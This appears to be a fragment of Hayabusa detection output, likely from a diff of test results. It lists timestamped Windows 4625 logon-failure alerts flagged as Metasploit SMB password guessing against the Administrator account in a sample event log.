+2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0V3TbNrKEnrDcEYt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: T73JW9JURm8Br6MA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OAleyg3h8aMvVVJk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1LQllnWZFUIWa6rw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hlwPxSGUmvYH0rpL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VrI56o5TyeO48rQV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CKRMn75tv5Yi5rYK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MbJvec7rVisJ6WCC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xoubp5WTPqblBaps  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rBczkR92cKY41icQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MfUx3OizEb1LiOzj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SRaSOLOWhBEr0qkz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YnlI8Zh4td5m1fpx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wXUDXDa4wi3HivKo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TT7iOtVMFcEysCcI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1NJpI7KC3gj99aWs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H39cv9JEuLEjlp93  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4p9h1cjLeUzppSZb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E0fOpi4vr55QmO6x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GiKI4V6kpkY5zc9x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dLmu4n9qZdf3Q5zo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 87iJdX2E0ZJintvr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nxc4iIHP0kdqQNiG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RJIWekwBwcIUWjD1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GdnvboiIDzXTZ8MR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QGMPHNpljTlMYeet  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pWo4uVFtAbe4IjKC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YAPdDqbMY4rYiuZ3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ai2WCQ3MkWwSeOy9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ey1wbsD7w3fs02xP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sVGzidwZICNfLizg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8zjGPMJ6RBw48Ejx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MydK8AjPvyyckCEL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4fqkCliAQMiFffQU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ITkku4kN4csBFyUB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f5g9kMkSFhKrT2Py  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1xKLdwujTmLEc9ts  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sAW1YzCQ3CreseaP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vhqBirEHOKPepR3n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5uqSFXpzAWOnc90n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: McbeS9lRpbMc48jO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I6J0d7dQUmJNKJlu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QG3WU91rhTP9odx7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hSQRgB8yMfhb03g1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bzbZjRXTc0XvV4Ry  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
